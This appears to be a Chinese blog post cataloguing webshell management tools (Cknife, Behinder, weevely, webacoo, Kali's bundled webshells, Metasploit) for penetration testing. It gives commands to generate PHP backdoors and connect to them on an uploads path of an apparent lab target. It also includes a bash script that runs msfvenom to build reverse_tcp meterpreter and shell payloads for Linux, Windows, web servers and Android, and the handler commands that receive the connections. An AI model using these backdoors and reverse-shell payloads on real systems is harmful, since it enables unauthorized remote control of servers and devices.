webshell管理工具

1 Cknife

/usr/lib/jvm/jdk1.8.0_281/bin/java -jar Cknife.jar &
  • 工具的使用:
    • 常见的一句话后门样例:
webshell管理工具
webshell管理工具

2 Behinder_v3.0

  • 工具启动:
/usr/lib/jvm/jdk1.8.0_281/bin/java -jar Behinder.jar
webshell管理工具
webshell管理工具

3 behinder_v4.0.5

  • 使用前先生成 webshell
webshell管理工具

随后上传后,使用对应的协议连接即可。

webshell管理工具

4 /usr/share/webshells

  • 在 kali 的 /usr/share/webshells 目录中,同样内置了一些 webshell 可供使用。
webshell管理工具
webshell管理工具

5 weevely

  • Weevely 是一款使用 python 编写的 webshell 工具,集 webshell 生成和连接于一身,采用 c/s 模式构建,可以算作是 linux 下的一款 php 菜刀替代工具,具有很好的隐蔽性。
webshell管理工具
weevely generate 12345 /root/fsec.php
weevely http://192.168.0.104/hackable/uploads/fsec.php 12345
webshell管理工具

6 webacoo

  • webacoo 是使用 Perl 语言编写的 Web 后门工具。
Options:
-g Generate backdoor code (-o is required)
-f FUNCTION PHP System function to use
FUNCTION
1: system (default)
2: shell_exec
3: exec
4: passthru
5: popen
-o OUTPUT Generated backdoor output filename
-r Return un-obfuscated backdoor code
-t Establish remote "terminal" connection (-u is required)
-u URL Backdoor URL
-e CMD Single command execution mode (-t and -u are required)
-m METHOD HTTP method to be used (default is GET)
-c C_NAME Cookie name (default: "M-cookie")
-d DELIM Delimiter (default: New random for each request)
-a AGENT HTTP header user-agent (default exist)
-p PROXY Use proxy (tor, ip:port or user:pass:ip:port)
-v LEVEL Verbose level
LEVEL
0: no additional info (default)
1: print HTTP headers
2: print HTTP headers + data
-l LOG Log activity to file
-h Display help and exit
update Check for updates and apply if any
webacoo -g -f 1 -o webacoo.php
webacoo -t -u http://192.168.0.104/hackable/uploads/webacoo.php
webshell管理工具

7 metasploit

  • 将如下脚本复制于 kaili 中,运行后即可创建多类型的脚本。
#!/bin/bash
echo "pls input your IP ADDRESS"
read ip
rm -rf shell*
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$ip LPORT=4444 -f elf > shell.elf
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=$ip LPORT=4444 -f elf > shell64.elf
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$ip LPORT=4444 -f exe > shell.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$ip LPORT=4444 -f exe > shell64.exe
msfvenom -p php/meterpreter/reverse_tcp LHOST=$ip LPORT=80 -f raw >shell.php
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$ip LPORT=4444 -f asp > shell.asp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=$ip LPORT=4444 -f raw > shell.jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=$ip LPORT=4444 -f war > shell.war
msfvenom -p cmd/unix/reverse_bash LHOST=$ip LPORT=4444 -f raw > shell.sh
msfvenom -p android/meterpreter/reverse_tcp LHOST=$ip LPORT=4444 R > shell.apk
  • PHP 的 shell 需要编辑下去除注释才能使用。
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 80
exploit
© 版权声明
THE END
喜欢就支持一下吧
点赞6 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容